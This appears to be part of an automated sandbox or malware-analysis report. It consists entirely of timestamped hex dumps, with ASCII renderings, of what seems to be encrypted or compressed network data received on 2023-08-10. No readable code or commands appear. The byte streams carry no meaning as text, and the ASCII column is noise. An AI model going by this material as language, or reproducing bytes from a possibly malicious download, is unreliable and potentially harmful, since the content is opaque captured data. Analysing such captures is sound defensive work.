                                                                                                                                                                                          Data Ascii: kMb,w9G4ep(U`A]% Y=Y\\sr8(l50mtS$ |7xLJq[mLatm)Nhv+U:4]APm h}SGB=*{: ^JnDT,TcPUKR&cTE~!x\!]u$kR
                                                                                                                                                                                          2023-08-10 08:17:30 UTC175INData Raw: 75 bc af 63 7e 50 7d d2 8a 16 50 34 ad 8a 5f 1e 1a a4 d2 07 7a 12 dd f8 1e 86 84 e2 7f 54 f7 4c ae ef 53 c3 a1 4e b3 b6 e9 94 49 c8 9a 7b 4c 41 eb 69 3d d6 e1 b4 95 e6 59 a4 d6 58 d3 b6 e7 e0 40 2d 84 16 84 93 0d c8 6e 44 c6 f2 99 b7 d9 89 e3 e4 cc 5d 7d 3b 0f 88 e7 71 10 8e 7e b3 b7 38 34 e1 fd 53 e6 82 29 04 1c 6a d3 22 b8 0a d7 bd 97 50 83 ca 67 58 8c 47 97 7b 07 18 e6 5d dc dd 50 e8 ce 73 f1 fa 2a ac 80 be 5f ed 55 43 aa 26 bf ac dc 92 7c d3 0a c7 7b 65 d2 10 82 e6 e5 99 54 8c 1a 7d 6e 91 49 fe 7e 63 b4 cb e9 b9 0c 9d 97 05 ac 92 0c 27 2a 2a 94 c7 d6 9a b0 24 17 2c b7 ce 36 0e 4c 70 a8 ba c7 c9 0a 0f 0c 46 2b 85 3a c3 a8 29 7a 49 c8 fa 0f e2 f9 20 2c fe 43 de d1 c5 8a be ab 18 7d 5b df c5 5e bf 7e 1e 41 24 13 b8 18 3f 8d 07 11 3a 66 84 07 10 00 9a cd
                                                                                                                                                                                          Data Ascii: uc~P}P4_zTLSNI{LAi=YX@-nD]};q~84S)j"PgXG{]Ps*_UC&|{eT}nI~c'**$,6LpF+:)zI ,C}[^~A$?:f
                                                                                                                                                                                          2023-08-10 08:17:30 UTC176INData Raw: 85 d2 44 67 13 10 54 62 ee b4 24 3c bd 7e ee ac 94 36 19 da 8a fb 8f 48 c0 84 ba 79 ca ee c9 f2 5f 60 e4 e0 6d 8c ab ad a5 fc 99 52 5e 0c fc 0a f1 d0 ba ce 89 47 00 c4 be 44 c9 36 b4 63 f4 b4 a5 d7 7b 45 61 61 b2 8a 56 df 60 26 33 3f d8 89 c2 8d ea 2c 75 b2 c0 40 9f cc cb ca cb cc 6e 55 43 e8 70 b1 ac cd de 65 e3 ca b3 1b dd 0f 8f 1b f7 79 3e 2f e6 02 e0 ca c3 c7 c1 f1 9e 88 cb 86 3d 6f 5c da 9c c3 bc a7 bd b6 8e 99 96 e7 5d 18 35 97 92 69 21 08 f4 32 0e 1d 02 0b 60 ef 1d f0 97 6e 42 3e f2 ad ca 43 bc 35 53 66 a5 43 db 97 ae c4 28 39 8d 33 1b cf 19 91 7b 09 3c 49 78 ba 3e 57 26 dc f8 42 3f b0 90 99 5d 7b 34 d3 d0 9e b3 77 27 d9 aa a4 7c da f7 e5 cd b7 e5 fa bd af f2 7f 41 ee 4d c1 14 09 f0 9e 65 8d db db ac 26 e8 84 a4 94 7c cd a2 f5 2d 87 31 85 e1 17 af
                                                                                                                                                                                          Data Ascii: DgTb$<~6Hy_`mR^GD6c{EaaV`&3?,u@nUCpey>/=o\]5i!2`nB>C5SfC(93{<Ix>W&B?]{4w'|AMe&|-1
                                                                                                                                                                                          2023-08-10 08:17:30 UTC177INData Raw: 68 1f 41 c6 ba 11 90 de 85 e1 16 18 4f 5c 05 47 cf c9 bc 08 5f 23 cf 86 c9 d8 89 39 40 68 c9 5c 67 42 87 eb 7a 1c 28 e4 05 f3 48 f6 3f ba bc cd 02 e9 68 97 c1 21 db d4 f4 60 bd f5 75 55 97 64 6b 53 2f 7e 23 e4 37 89 79 03 69 a5 e5 3a 26 bf a2 ba f9 ad b6 17 35 76 96 41 8f a5 f6 ae df 00 bd ff ac 60 34 2b 80 e1 70 45 40 5c
                                                                                                                                                                                          Data Ascii: hAO\G_#9@h\gBz(H?h!`uUdkS/~#7yi:&5vA`4+pE@\
                                                                                                                                                                                          2023-08-10 08:17:30 UTC178INData Raw: 4d 18 c0 f4 a9 93 ff 4f 86 f6 68 b9 05 3a e8 9e 46 8b 27 9b 7b 3a c3 dc 3f ba bf c9 0d 5f b0 85 d2 4a e8 ef e7 dd 1e 95 ee 5e 53 7c 77 a3 7f f4 ba e2 50 bd 97 c2 d7 a5 8d af ed af 7d 68 c3 d5 1e 72 b8 5b 3a 4a 27 3e b4 0c 14 46 19 7b 7a fe 6f e6 a0 35 63 db 15 90 67 69 d0 a1 ac 0b 5d 21 9a fa 7a be d5 24 37 0b af eb 9f c7 c9 f4 1d e5 ab 8e 22 8b fd a7 94 ab 91 2b 95 5a ad c4 8d 25 21 e9 51 53 f6 4d bb 31 ca 7f 94 ba ec e0 d9 1e 8f 31 c2 7c 93 30 59 71 95 d3 24 83 a0 fc 25 14 1e 4e 2a c9 3d 85 19 f3 2e 87 a4 46 67 47 3b c8 f4 de 5b 9e 19 e0 bb cc f1 81 5e 84 1c 31 d9 93 ae d4 0d df 72 e5 b9 e7 a7 b0 da 7f a1 d1 8e 1c 4d 7c 80 74 5f 1b c5 b7 dc 04 75 fa a9 5f 70 f7 b7 5c 0f da f7 3f 2e 33 25 75 f5 88 9f 29 1a fa 5f 22 12 a7 ff 06 19 9b 87 6c ee c7 a9 d2 a8
                                                                                                                                                                                          Data Ascii: MOh:F'{:?_J^S|wP}hr[:J'>F{zo5cgi]!z$7"+Z%!QSM11|0Yq$%N*=.FgG;[^1rM|t_u_p\?.3%u)_"l
                                                                                                                                                                                          2023-08-10 08:17:30 UTC179INData Raw: e9 06 d8 4b c5 37 89 de 39 d6 28 4d 01 44 e9 46 1b 7a b8 91 de 5d 7a c6 b7 9b 7e 65 8c 41 17 e0 43 90 f0 ab 2c 0e ca 17 7d 65 9f d7 8f ee e4 09 d0 dd f5 3d b4 3f ef 50 70 d7 c1 d5 7c d8 dc fd 33 bd 21 48 26 b5 21 28 f0 95 c9 6c 32 4f 3d fc e2 c5 4c 52 34 15 7f 28 5a 1d 58 b2 87 c3 f5 c0 6b fd 33 bb a8 20 cc ae f0 aa 52 f8 ce c9 e8 97 4b 4a a5 46 02 93 18 ef e8 ec 02 82 57 06 14 3d 3c 81 b6 f4 f4 74 66 4a 43 82 25 84 18 7f 4b 1f 88 67 29 a6 49 c5 24 97 ac 51 0c 75 26 ec b1 b1 48 7e 3d 7e 8e 5f 04 8c 54 42 49 71 c5 a0 c4 41 15 18 e9 23 40 8f 03 d6 25 3a 5b 63 38 58 79 60 37 64 72 0d 21 df 15 1b 6b de 5d 59 5b 60 c5 68 8c aa c5 d3 70 ee fe 9b c2 e6 ac bb 94 2a 99 ce 05 85 93 9a fb 21 3f fe 6c 9d 9f 19 10 d8 4d ac af d3 cd da 70 fd 4e 9c bc 74 ce df f2 8c ab
                                                                                                                                                                                          Data Ascii: K79(MDFz]z~eAC,}e=?Pp|3!H&!(l2O=LR4(ZXk3 RKJFW=<tfJC%Kg)I$Qu&H~=~_TBIqA#@%:[c8Xy`7dr!k]Y[`hp*!?lMpNt
                                                                                                                                                                                          2023-08-10 08:17:30 UTC180INData Raw: 83 80 74 02 ee 75 67 a8 00 a3 6b 92 3f f0 6b ac 91 4a 60 dc aa 04 80 1a 56 bd a7 21 17 82 4a 1e 62 be 0e 82 a0 b7 9a 07 20 0a 20 80 a3 51 49 45 6b 28 01 bc 89 d1 4b fe 6c 04 8d 6d 43 31 ec 7b 54 76 ec eb 4b 9e a2 82 5c be 51 28 29 6b f5 e5 0e 4d 74 83 11 dd 49 7f f2 35 e0 6a 0f 6f f6 8f ca fd db c9 45 d9 6d a2 61 f4 e3 c8 f5 01 e0 46 af cd 2c f8 db c9 ff 6d 02 dc d0 43 1d 04 2c aa 68 b9 e5 8b 88 bc 53 0b 0e d3 ca 38 90 51 f4 60 1d fe 46 70 f9 7a 8f 91 ac 53 1f 2c 54 28 50 a1 3d 48 9a 9e 41 61 ed 24 b9 d0 54 d9 be ab 10 f3 fa 3b 57 b7 fa d9 5a 8c 4b 08 ef 7a c8 12 73 49 f3 28 dd 73 7b 52 36 88 9d 58 bc 49 70 23 25 6b 7d b2 4a 97 65 98 7e 35 47 ad 67 08 95 2e 03 d3 23 65 70 3d d8 f4 96 b1 b6 8f cb 19 b1 16 a4 80 45 e4 0a aa 39 b7 34 98 3a e3 fc 10 b9 d6 90
                                                                                                                                                                                          Data Ascii: tugk?kJ`V!Jb QIEk(KlmC1{TvK\Q()kMtI5joEmaF,mC,hS8Q`FpzS,T(P=HAa$T;WZKzsI(s{R6XIp#%k}Je~5Gg.#ep=E94:
                                                                                                                                                                                          2023-08-10 08:17:30 UTC181INData Raw: a2 0b 60 32 c1 e9 93 c3 ec f3 02 75 8c df 18 b9 de 5c 0e aa a7 ab 6a 52 59 0c 0c 8e c9 59 b5 f4 5c 9c 0d 88 fc b2 3f 7d 83 d4 94 e0 04 85 d2 16 a5 9e 20 4f ac a2 2d d1 a5 e0 30 d1 3a ce 0d ef 48 c3 db 28 9b aa 94 a5 1a e8 bb 81 b1 89 ed f5 0a ac 5c 37 ff d4 56 ff bc 55 2e 41 0c 24 56 28 b5 c5 53 1f d1 d9 82 16 40 0b 6f c4 4b 6d 50 ca 08 82 14 64 9d d6 2c 02 59 89 97 18 30 ab b5 13 a3 7f 32 c6 40 68 4b f3 c7 cc 27 08 1a 4f 9d 9c 01 74 d8 a1 6c 6b 7b cb a6 59 34 04 67 ac 05 06 14 d3 76 93 77 48 68 1e 74 a7 04 2e 5c b1 56 0d dc 60 59 e1 67 25 0f cd 83 d3 9c f7 5b ba f7 d7 4a b7 b9 78 2a 0d 42 2f 78 44 c2 ef e0 a2 ad 94 96 bf 7e 4c ea 9d 8f 06 b7 42 74 c9 d4 87 3f 4f 69 cc bd 3b 06 3e cd d6 d7 4a 19 a3 22 69 09 45 d9 63 75 a7 3b 7c 38 b4 a5 96 65 be 37 e6 4b
                                                                                                                                                                                          Data Ascii: `2u\jRYY\?} O-0:H(\7VU.A$V(S@oKmPd,Y02@hK'Otlk{Y4gvwHht.\V`Yg%[Jx*B/xD~LBt?Oi;>J"iEcu;|8e7K
                                                                                                                                                                                          2023-08-10 08:17:30 UTC182INData Raw: c7 04 18 83 d7 aa da d8 98 c5 53 28 a7 9a 31 3e ca 56 d7 67 41 db 71 08 bd 51 fa 48 0e ac e4 78 a1 32 49 34 90 09 ef 83 ea 31 d8 93 a5 a9 e1 6b 31 9b 4a fc c9 25 48 02 75 f3 7e b2 bf 8b 8c 09 8d 3a bd a2 95 7b 83 9b dd 56 0a d9 e0 18 c0 bd 42 57 87 ec 95 56 29 4b dc 27 85 b8 cd 8c 0d 3e cb 92 17 e1 8a 00 23 fe 0f 3a 89 98 32 aa eb 80 87 10 e4 4c 0a 49 c2 22 ca 3e af a3 e3 e4 05 5f ed f3 8c 2a e5 0e dc 40 fe 6b e9 72 df 1b 60 56 2c d0 4f c7 46 fb db e7 15 23 85 23 ac 2c af e8 9a 32 4d 7f 69 4c 04 cf eb 6f fb e8 f8 95 5f 5b 53 d4 99 fb 49 e3 04 06 0b 5f ab 43 13 3f ab c9 e8 4a 77 64 7e c6 49 72 e3 75 62 2c d1 e5 bf 8e 58 e7 f5 d5 8f 51 1d a2 78 b9 8a 51 82 90 79 f0 7f 26 61 d7 31 0c 57 d7 e7 34 14 9e 75 91 19 44 1f 82 e2 29 08 aa 19 7a c6 ff 83 f9 48 5d 63
                                                                                                                                                                                          Data Ascii: S(1>VgAqQHx2I41k1J%Hu~:{VBWV)K'>#:2LI">_*@kr`V,OF##,2MiLo_[SI_C?Jwd~Irub,XQxQy&a1W4uD)zH]c
                                                                                                                                                                                          2023-08-10 08:17:30 UTC184INData Raw: d5 45 81 28 32 56 3e be ce 63 05 42 95 7e 3f 56 58 0c 0c 32 b8 f4 b3 ac 32 0e 01 d0 93 60 61 71 d0 09 49 ea 86 e3 f8 84 7e 05 26 67 b9 5c aa 83 78 f8 84 b1 b6 38 10 b5 29 db 94 1a f8 c6 bc c6 1f 94 8a dc 42 3d 7b f5 93 c9 b7 b1 50 70 5a 69 51 6c 4e 99 71 0f ff 99 ec 15 bd 86 67 4e fa 5a 37 74 37 67 85 8a cb 28 33 27 01 27 27 33 4d d1 43 80 f9 b0 a6 c4 44 4b 0e 90 60 77 d4 e4 a1 f9 d8 22 13 b5 8d b3 cd 66 c0 40 82 af 09 2e 1e b7 e1 4a 69 37 3a 46 8f 35 95 02 1d cf ba d7 9c 3d ad 07 cc 12 11 4c 30 1c 9c 38 6d 2c b9 54 68 32 6d 21 ca eb ee 4e 16 ce 72 ab de 61 33 ec f8 1a 4e f2 7f 18 2e 95 53 1d 7c 76 47 e8 86 63 03 b7 0f 9e b7 2a f7 19 bf dd 27 a7 a9 fa 34 63 b0 4e 78 44 c0 05 08 62 05 81 25 4b 08 c2 f9 b1 ba 83 f2 ae 42 b4 62 50 e3 7f 63 29 d3 1c 6b 10 9a
                                                                                                                                                                                          Data Ascii: E(2V>cB~?VX22`aqI~&g\x8)B={PpZiQlNqgNZ7t7g(3'''3MCDK`w"f@.Ji7:F5=L08m,Th2m!Nra3N.S|vGc*'4cNxDb%KBbPc)k
                                                                                                                                                                                          2023-08-10 08:17:30 UTC185INData Raw: 72 b7 13 c8 7b eb 81 b2 0c 0d e8 75 2f a9 4f 52 cc 2b d2 e1 16 af 18 23 0c d1 01 77 13 18 9c 0e aa 8f 95 7f f0 6c 76 7a 79 be a4 4d 5a bd 17 28 43 e6 7d 6e 3f 32 3c 9d d9 7a 33 e3 01 e9 85 38 9d 37 3d 8e 7d c4 03 e3 aa ac 81 47 ae 3e 08 f0 f2 41 67 fa 20 87 b2 ce de 9e aa e4 87 77 d8 a0 74 ee b6 b5 f2 f4 2d 51 4e 50 f3 c7 47 46 ef 84 a3 35 8c 29 7f 95 9a 78 7d 7c c1 8b a3 5b 14 21 ad 43 94 9f 0d da 4a 73 67 01 15 de 3b 33 71 31 da 8d 36 5d cb e9 97 be cd fd 90 6e 85 75 e2 a9 fd 12 ef 99 af 81 31 c4 dc 3f c7 15 63 d0 70 39 47 b9 22 20 6c 91 fa e0 64 99 9d 90 d2 25 1c e9 c2 1c 2e 68 de 88 40 6c e3 d2 af 5c 24 af 1c 8b 01 e2 df 25 7c 0f 55 c5 63 7c 30 6d d5 75 8e 9d c4 22 a1 ed c3 21 d9 aa 5c a2 5b 2e 9d 0d 14 55 05 ab 1b d8 47 7c f3 77 81 f0 a3 bf 8b bc 6b
                                                                                                                                                                                          Data Ascii: r{u/OR+#wlvzyMZ(C}n?2<z387=}G>Ag wt-QNPGF5)x}|[!CJsg;3q16]nu1?cp9G" ld%.h@l\$%|Uc|0mu"!\[.UG|wk
                                                                                                                                                                                          2023-08-10 08:17:30 UTC186INData Raw: 8a b1 f3 5d 2f 0c fc a3 4e 61 bd 87 b5 6d 46 c3 a8 f0 3e d6 e1 93 fb 46 c1 49 3d a6 82 a8 b6 d2 b5 2f 81 15 60 cc 2d b4 62 46 87 f3 87 4a 1a e7 8d eb 3a a2 3a 8d 71 70 e5 ce c4 12 ef 54 5f 33 66 5e db de 6f 33 72 35 db 76 ff de 25 4f ed db 00 e3 80 8c b9 47 81 13 df 57 6e 6b f8 69 f4 6e f9 8b 7f c1 87 48 40 6f 10 e8 13 0f c3 e5 fb be 15 54 f3 f5 df 36 2d 68 ea 21 e8 d5 db c0 99 a2 d7 41 98 45 e1 81 9f c4 bb f8 f0 25 35 0d 14 ff c3 6a ff c3 8a 93 85 83 4f 41 a2 c3 00 87 ce 1f 7f 76 f7 c9 3e 32 82 b7 21 64 15 23 d7 23 a9 39 e6 77 b3 24 82 57 ac 36 ac 9f 52 f0 80 e0 b7 56 4f 1b 87 8d 24 3f c0 72 91 06 47 84 0b 8c dc f5 d9 9a 04 07 60 33 1e 9b 08 fa 86 98 2c 3f c2 7b 60 ab 1e 2b 89 04 a5 05 dd 37 db 67 e1 c3 ee fd 41 5a ac cd 3d 75 01 48 5b 8e cf 48 46 1c 01
                                                                                                                                                                                          Data Ascii: ]/NamF>FI=/`-bFJ::qpT_3f^o3r5v%OGWnkinH@oT6-h!AE%5jOAv>2!d##9w$W6RVO$?rG`3,?{`+7gAZ=uH[HF
                                                                                                                                                                                          2023-08-10 08:17:30 UTC187INData Raw: 68 23 65 47 7a 03 f0 d7 91 e2 b4 e9 83 d9 e5 d1 26 6a 4e 70 f4 4a f9 b7 58 1a fa 68 56 69 e5 c0 59 aa ef f8 74 42 a5 bc e8 25 e9 a4 20 9e 23 de 61 43 c8 e3 e8 ad 24 3d e7 19 36 25 a2 c7 bc 3f 55 7b d9 fb 19 57 b4 be 0e 5f 19 68 dc c9 42 a1 eb dd 4c d6 23 bc bc da 53 47 28 53 be b0 b0 47 7f 0d d8 34 b5 82 65 4e 52 b0 db 0e a9 27 6c 0c e4 cc d5 b0 96 07 9b fd 28 2c a3 76 e5 8b dc 52 2c 2e 10 21 22 fa 93 ea 30 57 07 ad d4 1d d5 1e ab df 6b 64 df e7 37 1f bf 4a d2 90 6f f0 95 b5 21 5f 48 34 56 a0 22 9d 18 22 02 f0 88 86 5c bd f2 22 7d 85 86 32 32 1e 35 5e fa c9 e1 c0 db 93 8e 59 77 bd 23 94 59 94 c1 21 73 88 7b 53 36 76 9f 5e 0c ab 3f 64 c9 e0 5d a8 61 a3 f6 f7 9c c3 04 c3 16 64 f5 3c 2a 00 80 a2 ac 08 6c 4f f0 1e 6e 8c bb 85 35 48 9b 8b c1 eb 88 64 0c b9 ba
                                                                                                                                                                                          Data Ascii: h#eGz&jNpJXhViYtB% #aC$=6%?U{W_hBL#SG(SG4eNR'l(,vR,.!"0Wkd7Jo!_H4V""\"}225^Yw#Y!s{S6v^?d]ad<*lOn5Hd
                                                                                                                                                                                          2023-08-10 08:17:30 UTC189INData Raw: 35 3d e0 fb c1 8e 74 ff 43 3c e1 8a 7b ba d0 e3 57 8e 9d 28 ef 31 92 da 2e dd 30 e0 f6 01 cc b6 57 44 cd 4f 12 f0 b0 dd d3 2e a9 3e a2 4a fd ae b7 cb a0 23 8f fe a4 13 a6 c2 1e d0 25 04 92 ee d1 6a fa 18 29 93 d7 ca d0 cb 32 08 f7 85 a8 23 a2 51 3e c5 6f f6 20 b6 0a 88 44 d8 b9 a1 f0 6a 72 24 a4 09 43 06 a9 ad 09 62 36 4f 44 e5 e3 45 57 05 67 42 b2 4d 2d 35 a4 5e d5 b0 88 c6 a8 5c 8d 49 86 54 17 12 4a 81 75 89 67 96 ea fe 9a 8e 5f 81 58 8b 64 1e 63 ee 8a d2 d7 8c f9 7b 86 0f 16 de 79 a9 2b ec 98 07 e0 f8 c7 4e 05 22 97 bb 5c bc c2 31 ca 72 44 63 dd d0 89 4b 33 00 82 3d cb ec 98 be 0b c2 4a c0 d3 76 eb d6 a6 2b 10 58 a0 3b 07 28 1e 9a 1e b9 b0 64 43 2a bf 65 ff 65 8a b1 1d 8d d8 ac 4e 48 48 de b6 8e 28 60 bf c3 4e 6a 8e dc be 1c 6c 9c 77 23 5d 09 db b7 76
                                                                                                                                                                                          Data Ascii: 5=tC<{W(1.0WDO.>J#%j)2#Q>o Djr$Cb6ODEWgBM-5^\ITJug_Xdc{y+N"\1rDcK3=Jv+X;(dC*eeNHH(`Njlw#]v
                                                                                                                                                                                          2023-08-10 08:17:30 UTC190INData Raw: 64 06 6b 40 07 e0 e6 e3 b6 e0 42 c7 99 b4 e7 60 96 6b 6f 95 fc f5 e1 54 3a 76 98 a3 0a 99 91 31 2f 29 61 44 7c 87 74 5f 4a 1b 39 1d 2f 30 56 76 db e3 26 ec 89 fe 1e cc 29 8e df d1 0a 26 e2 f7 ed 00 8d 01 e3 b5 c3 f2 b6 c4 16 31 b5 f7 b1 52 c5 cf 6c ee ef ea a3 ef 8c cf 1c 87 5e 24 fc c0 9f 1b 31 7f db f6 1e 89 02 ba 54 d1 af 62 14 b1 03 04 f3 14 05 be 6b 92 67 66 b2 21 ff c3 f8 05 dd b8 f2 49 e9 4c 46 54 c5 f4 f4 81 30 3d a4 78 4f af 46 f6 b8 47 63 f9 a2 c6 44 1b 0a d0 b5 ad fc 05 1d 53 04 78 72 f0 8a dc de 9f 5d 82 ff f7 62 7e 68 35 fe 09 fa 33 83 b3 07 ee f1 3c 23 aa f2 91 0b c0 a9 cb e6 18 cc ec 48 25 21 f6 ad 3d 63 5d 47 cf 3e 9f 0f d3 52 d0 7b 25 1a 00 2e a0 22 ad d2 ff ac 7e a8 63 1b 02 52 9f 56 0a 83 6f b2 c2 2f 6b 46 42 2f d4 5a 93 24 93 4e 72 fa
                                                                                                                                                                                          Data Ascii: dk@B`koT:v1/)aD|t_J9/0Vv&)&1Rl^$1Tbkgf!ILFT0=xOFGcDSxr]b~h53<#H%!=c]G>R{%."~cRVo/kFB/Z$Nr
                                                                                                                                                                                          2023-08-10 08:17:30 UTC191INData Raw: ee bf 5c ee 08 3c 2c 6b 13 09 48 1f ba 4d 2a b4 68 40 f2 73 90 7f 13 f9 28 ce 76 73 20 29 ae e6 f9 6b d6 07 de ef 5d 35 6a 21 9c f4 f9 4e ed 27 79 c9 b3 a4 5b 62 6c 4d f7 c2 a8 cd 19 18 25 a6 46 32 72 3c 04 54 4c c7 78 67 c2 32 b7 ec 25 cc 90 c8 31 02 2a 4f 30 d3 7b 58 ca 4c f6 75 17 55 3a 16 00 2c f0 b7 ed 33 f6 8a 22 ed f8 5d 22 3c 22 b0 02 55 49 9b c9 32 fe be 1f 3f dc 91 63 6d 2c c9 0d b7 dc ab cd 44 c0 68 0d 3a e6 b5 ee dd d5 8c 8b 53 82 41 9b ca fe 12 c2 c0 c3 51 fb ed 46 5b 57 34 cd f0 ad ca 52 70 eb 61 a7 10 4a 34 db 8d e9 9c 32 b0 ae 34 11 f9 49 9c 0f 59 d4 52 1a 0a d0 47 bb 30 05 aa 0b 55 1d 17 74 71 a5 c8 22 a7 d7 60 3f 29 b0 29 0b f1 fc f9 81 77 e6 96 a1 53 3c a0 cb ec 8b c0 e7 0c 7e fe 64 d4 4e 7f 48 aa fa 8c b0 5c 00 36 2a 55 16 40 58 be 59
                                                                                                                                                                                          Data Ascii: \<,kHM*h@s(vs )k]5j!N'y[blM%F2r<TLxg2%1*O0{XLuU:,3"]"<"UI2?cm,Dh:SAQF[W4RpaJ424IYRG0Utq"`?))wS<~dNH\6*U@XY
                                                                                                                                                                                          2023-08-10 08:17:30 UTC192INData Raw: 95 4d 34 c2 95 4b a5 b2 02 36 7e b6 37 44 ea 1d a3 82 3a 34 45 d5 3f 02 31 19 b7 21 c1 be 27 f9 f3 e9 0e 69 08 0a 4d 0e 8b c4 e4 19 1a ef 5b eb 17 cb 8c 3c 75 f1 aa 99 6c e7 6c 6f 77 4f 55 d7 85 61 33 f5 71 98 13 80 e9 51 fe a1 b2 db 79 d7 75 f5 2c 53 28 5c 92 21 97 15 55 c5 ca bf 61 16 ce 2d 67 37 24 7e ad d5 e6 5c b5 42 5b 39 6e a1 3a c9 10 f7 5b c1 3d d4 20 df 0e 2c f7 ed 66 1a d9 b8 23 17 90 36 a9 4e 09 ce f8 09 6e a6 77 23 6d f7 2c ff f0 7d b9 60 29 bc 81 df f7 ec 51 e0 bb 34 14 8d 17 d7 f8 02 97 4a 5d 0b bd 10 ba 43 da 53 c6 6e 47 ec 33 09 9a 1e 38 f4 ac 6a a6 1a 11 b4 1f c0 52 cd ee 70 27 7d 15 df cb 52 ba 0e 35 b2 ca 68 eb cb 02 be e6 59 ca df 27 5f c4 8e 24 71 e0 54 5d 75 72 e0 28 89 68 5d b1 24 b0 5b 01 87 1d 7c e7 3b b8 f6 69 d3 48 9f 36 38 e8
                                                                                                                                                                                          Data Ascii: M4K6~7D:4E?1!'iM[<ullowOUa3qQyu,S(\!Ua-g7$~\B[9n:[= ,f#6Nnw#m,}`)Q4J]CSnG38jRp'}R5hY'_$qT]ur(h]$[|;iH68
                                                                                                                                                                                          2023-08-10 08:17:30 UTC193INData Raw: 33 c0 e8 d3 2d 50 41 06 8c b3 8b c0 c3 cb 15 55 a2 0e 3d af c2 5d 7b 36 f4 d5 67 2f 6b d0 fa f2 43 44 88 55 50 99 2b 00 68 d5 f2 e5 bf 75 8f 6a 5a 17 25 34 d2 9a 69 65 1d 27 fa 7b 4e b7 1c 19 bd 32 c4 33 d0 b9 12 2f 7e 98 b6 1d de fb a0 09 0c 5d 77 52 f8 23 bc 8e 62 9e b7 b3 a9 55 65 f4 d7 10 f1 e0 b2 88 e0 fa db b4 a8 9c
                                                                                                                                                                                          Data Ascii: 3-PAU=]{6g/kCDUP+hujZ%4ie'{N23/~]wR#bUe
                                                                                                                                                                                          2023-08-10 08:17:30 UTC194INData Raw: 9c c2 f7 eb b6 db 7d 4c c3 ea 4e 58 4f a9 93 9a 7d c8 78 2c 0a 99 10 d0 df 75 07 c3 86 57 54 f7 3c 45 f2 72 42 29 d2 69 5f ef a7 fb 97 56 44 0a ee 05 23 6c 9e 96 dd 05 13 67 c6 80 10 5f c2 1d bd 0c 6a 5f 35 52 7e e4 9a cd b0 9d 47 f4 a5 c1 db 51 bc 0c 6e 2e 5a 99 b6 14 77 4d 5c 07 36 8b 1e 07 8c d2 14 d3 67 a1 b9 7c a2 25 97 fb b7 ca 3a 5b f6 b8 85 4f 76 fd f4 c7 48 66 26 e1 80 17 a2 01 3e 99 ab 3a aa a1 c9 0c f6 68 7d 8d 9e 61 8d 1d b1 52 14 88 70 7f 14 5c 31 fa 0e 74 64 1c 3c 87 48 0b 65 f3 eb d2 d2 6a 8c 26 78 a2 ab b2 7a ed f7 8b 02 35 3c 5f 1b 7d d8 ee 8f 99 77 2a be 05 89 d0 90 4b a6 e2 02 81 71 63 9d 3a 97 a8 1a 6c 0f c6 e6 d9 36 12 b4 a9 18 6c df c6 06 99 d9 ca f6 76 0b c2 36 97 63 65 23 e6 7d 9b ad 0d c8 41 2b f7 06 7a c8 77 70 dd d9 be f0 45 ed
                                                                                                                                                                                          Data Ascii: }LNXO}x,uWT<ErB)i_VD#lg_j_5R~GQn.ZwM\6g|%:[OvHf&>:h}aRp\1td<Hej&xz5<_}w*Kqc:l6lv6ce#}A+zwpE
                                                                                                                                                                                          2023-08-10 08:17:30 UTC195INData Raw: 4a 54 9e 6e 9b 7d 36 61 2c 35 a4 a0 13 f4 45 8d c8 ed ef 51 85 5b 90 27 f9 d3 b4 e5 67 43 ea 64 1e cf 35 35 d1 35 1c 82 4c e4 36 0b 92 ca a9 97 f9 70 7a 44 a0 57 d0 cc f4 11 d6 40 e5 5f 8a b4 f8 ed 23 41 42 be 1c 9d 7b 62 83 fe fa 9e e0 9b 6e c3 68 56 79 da d6 09 c3 8e 61 cc c0 71 87 64 5a 03 da 9f 3f 53 72 df 29 23 fc d6 c7 be ab 94 92 ea a8 5b 19 72 1f eb 10 81 30 e5 a2 e4 48 3d 84 23 4a e3 1f 48 3d f3 1f 5c 0c 51 df b4 18 9c 6c 24 58 8e 84 0e 3c a0 72 55 54 e2 ba 4a b0 44 01 76 bf 3b e3 78 33 01 14 50 83 64 cd 0e ec f9 1c 2a 83 72 05 97 11 99 fc 85 35 78 11 95 53 6e b5 42 37 22 be 9a b6 d6 cc 8c 3d 8f 6b 56 3d 1b b1 d5 40 c6 fb 04 15 94 4e 97 44 75 d2 a7 65 4c 26 60 62 26 e8 22 1b 0b 6c dc 0b 80 de a6 16 d7 be d8 13 e4 30 1c 70 55 9e 5a 01 09 71 01 65
                                                                                                                                                                                          Data Ascii: JTn}6a,5EQ['gCd555L6pzDW@_#AB{bnhVyaqdZ?Sr)#[r0H=#JH=\Ql$X<rUTJDv;x3Pd*r5xSnB7"=kV=@NDueL&`b&"l0pUZqe
                                                                                                                                                                                          2023-08-10 08:17:30 UTC196INData Raw: ca 9f 4f c3 8a 6a 23 53 99 5c d6 95 f7 2a 3b 44 c6 cd 31 90 77 85 46 30 9a 47 f8 53 30 7b 2d 44 31 e1 71 58 af a3 11 72 5c ac 8f 1b 36 ea e0 6c 46 fe fa 36 79 c6 f8 75 11 90 38 e7 21 0f 66 91 53 dd 98 83 16 cc 8e eb 7b f8 b7 89 3d fb 37 e6 24 6d 12 16 b5 7b 69 88 14 74 50 f9 1f be be 98 94 c4 01 2a 50 b3 6c 6c f0 da 33 96 7b 78 39 6e ad cd c1 dd 83 da a1 ab 15 cc d1 b7 7f 31 0c 58 85 af e7 5a 18 b5 13 bc 87 c1 eb a4 e1 b9 72 a1 d8 a3 cd a0 07 51 be b6 de 92 cb 65 ed 3d c7 3a 9e c9 b9 e2 00 f4 f0 3e 49 bf de 8a 87 85 c5 54 68 89 6c 9f 1a e6 05 ab 9d 5a e5 6c 9e 12 70 a4 9f 10 09 fa 79 b1 aa 7d de 79 db 29 97 fe 88 7b d1 7d 8e d9 73 20 c7 81 28 10 fd 1c bc 05 c4 2c 60 3a f1 b5 90 e0 ed cb 83 43 a4 a8 e1 41 e7 4b 3b 87 0c bc c6 89 87 a9 e7 5e c0 ee f1 de a9
                                                                                                                                                                                          Data Ascii: Oj#S\*;D1wF0GS0{-D1qXr\6lF6yu8!fS{=7$m{itP*Pll3{x9n1XZrQe=:>IThlZlpy}y){}s (,`:CAK;^
